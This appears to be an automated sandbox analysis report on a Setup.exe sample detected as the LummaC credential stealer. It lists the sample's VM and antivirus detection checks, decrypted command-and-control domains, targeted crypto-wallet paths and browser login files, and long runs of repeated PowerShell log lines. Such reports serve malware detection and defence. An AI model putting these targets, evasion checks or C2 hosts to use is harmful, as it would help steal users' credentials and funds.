Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\Desktop\Setup.exe

System information queried: FirmwareTableInformation

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5534			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4163			Jump to behavior

Source: C:\Users\user\Desktop\Setup.exe TID: 1216	Thread sleep time: -210000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe TID: 1368	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4124	Thread sleep count: 5534 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3412	Thread sleep count: 4163 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2208	Thread sleep time: -7378697629483816s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\Setup.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: Setup.exe, 00000000.00000003.1823765883.0000000001002000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWw
Source: powershell.exe, 00000004.00000002.2018847996.0000000004686000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Remove-NetEventVmNetworkAdapter
Source: powershell.exe, 00000004.00000002.2018847996.0000000004686000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Add-NetEventVmNetworkAdapter
Source: Setup.exe, 00000000.00000003.1823765883.0000000001002000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: powershell.exe, 00000004.00000002.2018847996.0000000004686000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Get-NetEventVmNetworkAdapter
Source: Setup.exe, 00000000.00000003.1995816294.0000000000FD1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW`

Source: C:\Users\user\Desktop\Setup.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00F5041F mov edx, dword ptr fs:[00000030h]	0_2_00F5041F
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00F509DF mov eax, dword ptr fs:[00000030h]	0_2_00F509DF
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00F5102F mov eax, dword ptr fs:[00000030h]	0_2_00F5102F
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00F5102E mov eax, dword ptr fs:[00000030h]	0_2_00F5102E
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00F50D8F mov eax, dword ptr fs:[00000030h]	0_2_00F50D8F

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

LummaC encrypted strings found

Source: Setup.exe	String found in binary or memory: tentabatte.lat
Source: Setup.exe	String found in binary or memory: bashfulacid.lat
Source: Setup.exe	String found in binary or memory: talkynicer.lat
Source: Setup.exe	String found in binary or memory: curverpluch.lat
Source: Setup.exe	String found in binary or memory: manyrestro.lat
Source: Setup.exe	String found in binary or memory: shapestickyr.lat
Source: Setup.exe	String found in binary or memory: wordyfindy.lat
Source: Setup.exe	String found in binary or memory: slipperyloo.lat
Source: Setup.exe	String found in binary or memory: beefshooti.click

Source: C:\Users\user\Desktop\Setup.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\Setup.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: Setup.exe, 00000000.00000003.1931764035.000000000107A000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1931882448.0000000003920000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1951085152.000000000105C000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Users\user\Desktop\Setup.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: Setup.exe PID: 6596, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Found many strings related to Crypto-Wallets (likely being stolen)

Source: Setup.exe	String found in binary or memory: Wallets/Electrum
Source: Setup.exe	String found in binary or memory: Wallets/ElectronCash
Source: Setup.exe	String found in binary or memory: window-state.json
Source: Setup.exe, 00000000.00000003.1996415854.0000000001066000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: jenllpjcblmjkfcffne","ez":"Jaxx Liberty"},{"en":"fihkakfobkmkjojpchpfgcmhfjn
Source: Setup.exe, 00000000.00000003.1909177966.000000000101C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: Setup.exe, 00000000.00000003.1903279526.000000000105D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: exodus
Source: Setup.exe	String found in binary or memory: Wallets/Ethereum
Source: Setup.exe, 00000000.00000003.1903279526.000000000105D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: Setup.exe, 00000000.00000002.1998349657.0000000000FFB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: keystore

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
